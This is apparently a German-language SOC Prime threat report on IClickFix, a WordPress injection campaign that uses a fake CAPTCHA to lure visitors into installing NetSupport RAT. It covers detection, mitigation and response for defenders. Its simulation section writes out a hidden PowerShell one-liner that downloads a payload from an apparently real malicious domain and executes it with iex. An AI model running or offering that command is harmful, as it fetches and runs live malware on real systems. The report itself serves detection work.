SOC Prime Bias: Mittel

03 Feb 2026 18:25 UTC

Lernen Sie IClickFix kennen: Ein weit verbreitetes WordPress-Framework, das die ClickFix-Taktik nutzt

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
Lernen Sie IClickFix kennen: Ein weit verbreitetes WordPress-Framework, das die ClickFix-Taktik nutzt
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Der Bericht beschreibt IClickFix, ein bösartiges JavaScript-Framework, das WordPress-Seiten kompromittiert und ein gefälschtes Cloudflare-Drehkreuz-ähnliches CAPTCHA präsentiert. Der Köder zwingt Besucher dazu, einen PowerShell-Befehl auszuführen, der herunterlädt und installiert NetSupport RAT. Die Zustellung wird durch ein Verkehrsumverteilungssystem unterstützt, das um den YOURLS URL-Kürzer und eine rotierende Gruppe von Redirector-Domains aufgebaut ist. Forscher beobachteten seit Ende 2024 weltweit mehr als 3.800 kompromittierte WordPress-Seiten, die diese Kette bedienen.

Untersuchung

Sekoia-Analysten identifizierten das injizierte JavaScript-Tag ic-tracker-js auf kompromittierten Seiten und rekonstruierten dann den Umleitungsablauf über mehrere kurzlebige Domains. Sie erfassten das genaue PowerShell-Ausführungsmuster, das verwendet wurde, um die endgültige Nutzlast abzurufen, und stellten die abgeworfenen NetSupport RAT-Komponenten zusammen mit zugehörigen C2-Infrastrukturindikatoren wieder her.

Minderung

Überwachen Sie Webinhalte auf die ic-tracker-js Injektion und blockieren Sie bekannte bösartige Domains, Umleiter und Kurz-Links-Dienste, die in der Kette verwendet werden. Auf Endgeräten erkennen Sie PowerShell-Download-und-Ausführungs-Muster, die mit dem ClickFix-Köder übereinstimmen. Ergänzen Sie den Schutz um die Erstellung von NetSupport-Clientdateien und die Persistenz über user-level Run Registry-Schlüssel.

Antwort

Wenn Indikatoren auftreten, isolieren Sie das Endgerät, stoppen Sie den aktiven PowerShell-Prozess und entfernen Sie NetSupport-Binärdateien sowie jegliche Registry-basierte Persistenz. Führen Sie anschließend eine vollständige forensische Prüfung durch, um sicherzustellen, dass der Angreifer keine zusätzlichen Implantate eingesetzt oder sekundäre Zugangspfade eingerichtet hat.

Angriffsablauf

Simulation Ausführung

Voraussetzung: Die Telemetrie- & Basislinien-Überprüfung muss bestanden sein.

  • Angriffs-Narrativ & Befehle:

    Ein Gegner, der initialen Zugang zum Endpunkt hat, möchte einen dauerhaften Fuß in der Tür verschaffen, indem er den NetSupport RAT bereitstellt. Um interaktive Erkennung zu vermeiden, starten sie PowerShell im versteckten Modus ohne Profil oder Logo (-w hidden -nop -c). Sie verwenden dann Invoke‑WebRequest (iwr) um eine bösartige JSON-Nutzlast herunterzuladen (tytuy.json), die ein PowerShell-Skript für den RAT enthält. Das Skript wird in das temporäre Verzeichnis geschrieben und über Invoke‑Expressionausgeführt. Diese genaue Befehlszeile entspricht den Zeichenfolgen, die die Sigma-Regel überwacht.

  • Regressionstestskript:

    # PowerShell-Einzeiler, der der Erkennungsregel entspricht
    $url = 'https://scottvmorton.com/tytuy.json'
    $out = "$env:TEMPpayload.ps1"
    
    powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)"
  • Bereinigungskommandos:

    # Entfernen Sie die heruntergeladene Nutzlast und alle verbleibenden PowerShell-Prozesse
    Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue
    Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force